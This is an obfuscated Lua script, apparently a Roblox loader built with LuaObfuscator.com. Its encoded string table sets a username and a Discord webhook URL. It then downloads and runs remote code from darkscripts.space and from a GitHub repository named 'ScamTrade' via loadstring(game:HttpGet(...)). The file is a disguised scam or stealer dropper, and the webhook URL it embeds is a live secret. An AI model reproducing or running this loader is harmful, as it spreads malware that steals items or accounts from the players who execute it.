--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=0;local v91;while true do if (v90==0) then v91=v2(v0(v30,16));if v19 then local v122=0;local v123;while true do if (v122==0) then v123=v5(v91,v19);v19=nil;v122=1;end if (v122==1) then return v123;end end else return v91;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v92=0 -0 ;local v93;while true do if (v92==(877 -(282 + 595))) then v93=(v31/((5 -3)^(v32-(1 -0))))%(((1641 -(1523 + 114)) -2)^(((v33-1) -(v32-1)) + (620 -(555 + 64)))) ;return v93-(v93%(932 -(771 + 86 + (105 -31)))) ;end end else local v94=((1635 -(68 + 997)) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v94 + v94))>=v94) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==((0 + 0) -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=118 -(32 + 85) ;end if (v34==(1 + 0)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -(1 + 0)) );v18=v18 + (354 -(87 + 263)) ;return (v41 * (16777396 -(67 + 113))) + (v40 * (160901 -95365)) + (v39 * 256) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(11 -8)) then if (v47==(952 -(802 + 150))) then if (v46==(0 -0)) then return v48 * (0 -0) ;else local v124=0 + 0 ;while true do if (v124==(997 -(915 + 82))) then v47=2 -1 ;v45=0 + 0 ;break;end end end elseif (v47==(2691 -644)) then return ((v46==((378 + 809) -(1069 + 97 + 21))) and (v48 * ((2 -1)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(178 + 845) ) * (v45 + (v46/((3 -(773 -(201 + 571)))^((1190 -(116 + 1022)) + 0)))) ;end if (v42==((3297 -2505) -(368 + 423))) then v45=3 -2 ;v46=(v20(v44,19 -(10 + 8) ,76 -56 ) * ((444 -(416 + 26))^32)) + v43 ;v42=2;end if (v42==(6 -4)) then v47=v20(v44,10 + 11 ,54 -23 );v48=((v20(v44,470 -(145 + 293) )==(431 -(44 + 386))) and  -1) or (1487 -(998 + 488)) ;v42=2 + 1 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==((339 + 521) -(814 + 45))) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=2;end if (v50==(1 + 2)) then return v6(v52);end if (v50==(1 + 1)) then v52={};for v114=886 -(261 + 624) , #v51 do v52[v114]=v2(v1(v3(v51,v114,v114)));end v50=(13 -9) -(1748 -(760 + 987)) ;end if (v50==(1080 -(1020 + 60))) then v51=nil;if  not v49 then local v121=1423 -(630 + 793) ;while true do if (((1913 -(1789 + 124)) -0)==v121) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v113=(function() return 0;end)();while true do if (v113~=0) then else if (1~=v104) then else local v127=(function() return 0;end)();while true do if (0==v127) then while true do if ((0 -0)~=v95) then else v96=(function() return v97();end)();if (v98(v96, #":", #" ")~=(1700 -(1419 + 281))) then else local v178=(function() return 0 -0 ;end)();local v179=(function() return;end)();local v180=(function() return;end)();local v181=(function() return;end)();local v182=(function() return;end)();while true do if ((76 -(71 + 3))==v178) then while true do if (v179==(2 + 0)) then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if ((0 -0)==v187) then v188=(function() return 0 -0 ;end)();while true do if (v188~=(241 -(187 + 54))) then else if (v98(v181, #"|", #",")~= #"\\") then else v182[782 -(162 + 618) ]=(function() return v99[v182[2 + 0 ]];end)();end if (v98(v181,2,2 + 0 )~= #"|") then else v182[ #"91("]=(function() return v99[v182[ #"xnx"]];end)();end v188=(function() return 1;end)();end if (v188==1) then v179=(function() return  #"xxx";end)();break;end end break;end end end if (v179==0) then local v189=(function() return 0 -0 ;end)();while true do if (v189~=(1 -0)) then else v179=(function() return  #"/";end)();break;end if (v189==(0 + 0)) then v180=(function() return v98(v96,2, #"91(");end)();v181=(function() return v98(v96, #"0313",1642 -(1373 + 263) );end)();v189=(function() return 1001 -(451 + 549) ;end)();end end end if ( #"["==v179) then local v190=(function() return 0;end)();local v191=(function() return;end)();while true do if (v190==0) then v191=(function() return 0;end)();while true do if (v191~=(1 + 0)) then else v179=(function() return 2;end)();break;end if (v191==0) then v182=(function() return {v100(),v100(),nil,nil};end)();if (v180==(0 -0)) then local v196=(function() return 0 -0 ;end)();local v197=(function() return;end)();while true do if (v196~=0) then else v197=(function() return 1384 -(746 + 638) ;end)();while true do if (v197~=0) then else v182[ #"gha"]=(function() return v100();end)();v182[ #"http"]=(function() return v100();end)();break;end end break;end end elseif (v180== #"<") then v182[ #"nil"]=(function() return v101();end)();elseif (v180==(1 + 1)) then v182[ #"19("]=(function() return v101() -((2 -0)^16) ;end)();elseif (v180~= #"91(") then else local v202=(function() return 341 -(218 + 123) ;end)();local v203=(function() return;end)();while true do if (v202==(1581 -(1535 + 46))) then v203=(function() return 0 + 0 ;end)();while true do if (v203==(0 + 0)) then v182[ #"19("]=(function() return v101() -((562 -(306 + 254))^16) ;end)();v182[ #"0836"]=(function() return v100();end)();break;end end break;end end end v191=(function() return 1;end)();end end break;end end end if (v179== #"xxx") then if (v98(v181, #"nil", #"-19")== #">") then v182[ #".dev"]=(function() return v99[v182[ #"?id="]];end)();end v102[v103]=(function() return v182;end)();break;end end break;end if (v178==(0 + 0)) then local v185=(function() return 0;end)();while true do if (v185==(1 -0)) then v178=(function() return 1468 -(899 + 568) ;end)();break;end if (v185==0) then v179=(function() return 0;end)();v180=(function() return nil;end)();v185=(function() return 1 + 0 ;end)();end end end if (v178~=(2 -1)) then else local v186=(function() return 0;end)();while true do if (v186~=(603 -(268 + 335))) then else v181=(function() return nil;end)();v182=(function() return nil;end)();v186=(function() return 291 -(60 + 230) ;end)();end if (v186==(573 -(426 + 146))) then v178=(function() return 1 + 1 ;end)();break;end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end if (v104~=(1456 -(282 + 1174))) then else local v128=(function() return 0;end)();while true do if (v128~=(811 -(569 + 242))) then else v95=(function() return 0;end)();v96=(function() return nil;end)();v128=(function() return 1;end)();end if (v128~=1) then else v104=(function() return 1;end)();break;end end end break;end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();local v109=(function() return;end)();while true do if (v108==0) then v109=(function() return 0 -0 ;end)();while true do if ((0 + 0)~=v109) then else local v129=(function() return 1024 -(706 + 318) ;end)();while true do if (v129==(1251 -(721 + 530))) then v105[v106-#":" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"~",v59 do local v69=(function() return 0 -0 ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69~=(0 + 0)) then else local v116=(function() return 0;end)();while true do if (1~=v116) then else v69=(function() return 701 -(271 + 429) ;end)();break;end if (v116==0) then v70=(function() return 0;end)();v71=(function() return nil;end)();v116=(function() return 1;end)();end end end if (v69~=1) then else v72=(function() return nil;end)();while true do if (v70~=1) then else if (v71== #"~") then v72=(function() return v21()~=(0 + 0) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"19(") then v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end if (v70~=(1500 -(1408 + 92))) then else local v126=(function() return 0;end)();while true do if (v126~=0) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v126=(function() return 1;end)();end if (v126==1) then v70=(function() return 1;end)();break;end end end end break;end end end v58[ #"nil"]=(function() return v21();end)();for v73= #"}",v23() do FlatIdent_D79D,Descriptor,v21,v20,v60,v22,v23,v55,v73=(function() return v53(FlatIdent_D79D,Descriptor,v21,v20,v60,v22,v23,v55,v73);end)();end for v74= #"|",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1087 -(269 + 192 + 625) ];local v66=v62[1290 -(423 + 570 + 295) ];local v67=v62[1 + 2 ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=1 + 0 ;local v80= -(1172 -(418 + 753));local v81={};local v82={...};local v83=v12("#",...) -(1 + 0) ;local v84={};local v85={};for v110=0 + 0 ,v83 do if (v110>=v77) then v81[v110-v77 ]=v82[v110 + 1 + 0 ];else v85[v110]=v82[v110 + (530 -(406 + 123)) ];end end local v86=(v83-v77) + (1770 -(1749 + 20)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + 0 ];if (v88<=((3702 -2373) -(1249 + 73))) then if ((4844>2253) and (v88<=(2 + 1))) then if ((452==452) and (v88<=(1146 -(466 + 679)))) then if (v88>((0 -0) -0)) then v85[v87[5 -3 ]]=v64[v87[1903 -(106 + 522 + 1272) ]];else do return;end end elseif ((v88==((4 -3) + 1)) or (4557<2087)) then local v132=v87[1 + (754 -(239 + 514)) ];v85[v132]=v85[v132](v13(v85,v132 + (2 -1) ,v80));else v85[v87[5 -(2 + 1) ]]=v87[(1446 -(797 + 532)) -(4 + 80 + 30) ];end elseif ((3874==3874) and (v88<=(589 -(20 + 37 + 527)))) then if (v88>(1431 -((96 -55) + 1386))) then v85[v87[105 -(17 + 86) ]]=v64[v87[3 + 0 ]];else local v138=0 -0 ;local v139;local v140;while true do if (v138==((1202 -(373 + 829)) -0)) then v139=v87[2];v140=v85[v87[3]];v138=167 -(122 + 44) ;end if (v138==(1 -0)) then v85[v139 + (3 -2) ]=v140;v85[v139]=v140[v87[4 + 0 ]];break;end end end elseif ((v88>(1 + 5)) or (1938>4935)) then v85[v87[3 -1 ]]();else do return;end end elseif ((v88<=11) or (4255<3423)) then if (v88<=9) then if ((1454<=2491) and (v88>(73 -(30 + 35)))) then v85[v87[2]]();else local v141=0 + 0 ;local v142;while true do if (v141==((1988 -(476 + 255)) -(1043 + 214))) then v142=v87[7 -(1135 -(369 + 761)) ];v85[v142]=v85[v142](v13(v85,v142 + ((702 + 511) -((586 -263) + 889)) ,v80));break;end end end elseif (v88==10) then local v143=v87[5 -3 ];local v144=v85[v87[583 -(361 + (414 -195)) ]];v85[v143 + (321 -(53 + (505 -(64 + 174)))) ]=v144;v85[v143]=v144[v87[1 + 0 + 3 ]];else v64[v87[416 -(15 + (588 -190)) ]]=v85[v87[984 -(18 + 964) ]];end elseif (v88<=(48 -35)) then if (v88==(7 + 5)) then v85[v87[2 + 0 ]]=v87[3];else v64[v87[853 -(20 + 830) ]]=v85[v87[(338 -(144 + 192)) + 0 ]];end elseif (v88>(140 -((332 -(42 + 174)) + 10))) then local v154=v87[1 + 0 + 1 ];local v155,v156=v78(v85[v154](v13(v85,v154 + (739 -(449 + 93 + 196)) ,v87[6 -3 ])));v80=(v156 + v154) -(1 + 0 + 0) ;local v157=(1504 -(363 + 1141)) + 0 ;for v164=v154,v80 do local v165=0 + 0 ;while true do if (v165==(0 -0)) then v157=v157 + (2 -1) ;v85[v164]=v155[v157];break;end end end else local v158=1551 -(1126 + 425) ;local v159;local v160;local v161;local v162;while true do if ((v158==(406 -(118 + 287))) or (4157<=2803)) then v80=(v161 + v159) -1 ;v162=0 -(1580 -(1183 + 397)) ;v158=2;end if (v158==(1123 -(118 + 1003))) then for v176=v159,v80 do local v177=0 -0 ;while true do if ((4853>=2982) and ((0 -0)==v177)) then v162=v162 + (378 -(142 + 235)) ;v85[v176]=v160[v162];break;end end end break;end if (v158==(0 -0)) then v159=v87[1 + 1 ];v160,v161=v78(v85[v159](v13(v85,v159 + (978 -(553 + 424)) ,v87[5 -(2 + 0) ])));v158=1 + 0 ;end end end v79=v79 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!093Q0003083Q00557365726E616D65030D3Q004772616E745F6A6F7264616E3503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31332Q30334Q342Q33382Q333230352Q372F385375544E2Q504F5658364759637433754B656D6C2Q582D4A556D50387549385F706F6E4864384C4443654C567256335A556C494846795F49344F77496864482D4F7867030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F034A3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53702Q6564584875622F5363616D54726164652F726566732F68656164732F6D61696E2F5363616D00133Q00120C3Q00023Q00120D3Q00013Q00120C3Q00043Q00120D3Q00033Q0012013Q00053Q001201000100063Q00200400010001000700120C000300084Q000E000100034Q00085Q00022Q00093Q000100010012013Q00053Q001201000100063Q00200400010001000700120C000300094Q000E000100034Q00085Q00022Q00093Q000100012Q00063Q00017Q00",v9(),...);
